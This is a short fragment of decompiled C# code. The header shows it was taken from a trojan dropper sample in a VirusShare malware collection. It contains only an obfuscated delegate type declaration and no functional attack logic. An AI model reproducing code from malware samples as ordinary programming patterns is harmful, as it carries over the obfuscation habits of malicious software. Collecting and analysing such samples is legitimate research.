// Decompiled with JetBrains decompiler // Type: 㓆௉讘缄貱鉟ꕦ // Assembly: scan, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: C0A4408A-6830-4FA8-819B-3D801C5B54D7 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.epwx-6071ef40caa18e93eea0d00f252e0ef03c97d96be12ad3f375d8a38aa3517cd6.exe using System.Runtime.InteropServices; internal delegate byte[] 㓆\u0BC9讘\uEC2B缄貱鉟ꕦ([In] object obj0);